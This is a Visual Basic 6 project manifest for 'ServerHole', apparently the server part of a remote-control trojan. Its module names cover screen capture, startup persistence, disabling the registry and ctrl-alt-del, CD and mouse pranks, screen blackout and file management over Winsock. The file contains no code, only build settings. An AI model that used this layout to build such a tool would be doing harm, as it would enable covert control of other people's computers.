Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\SYSTEM\STDOLE2.TLB#OLE Automation
Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX
Object={F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0; COMDLG32.OCX
Form=server.frm
Module=basMouse; basMouse.bas
Module=CaptureScreen; CaptureScreen.bas
Module=ResolutionAndWindows; ResolutionAndWindows.bas
Module=startup; startup.bas
Module=transp; transp.bas
Module=URL; URL.bas
Module=Winsock2; Winsock2.bas
Module=OpenCloseCD; OpenCloseCD.bas
Module=SwapMouseButtons; SwapMouseButtons.bas
Module=WorkWithINI; WorkWithINI.bas
Module=ChangeBackground; ChangeBackground.bas
Module=DisableRegFunct; DisableRegFunct.bas
Module=AccessWinReg; Access~1.bas
Module=RandomMouseMove; RandomMouseMove.bas
Module=PauseData; Pause.bas
Module=Module1; isConnected.bas
Module=WinThreads; WinThreads.bas
Form=NetHole_Message.frm
Module=basRegistry; basRegistry.bas
Module=Subclassing; mdSubclassing.bas
Module=mdlFileManager; mdlFileManager.bas
Module=mdFindFilesMod; mdFindFilesMod.bas
Module=mdThread; mdThread.bas
Form=frmPic.frm
Module=ctrl; ctrl-alt-del.bas
Form=frmFreeZee.frm
Module=mdonTOP; mdonTOP.bas
Module=WinFunctions; WinFunctions.bas
Form=frmblackout.frm
Module=finReg; finReg.bas
IconForm="frmMain"
Startup="frmMain"
ExeName32="MainServer.exe"
Path32=".."
Command32=""
Name="ServerHole"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName=" Theo"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
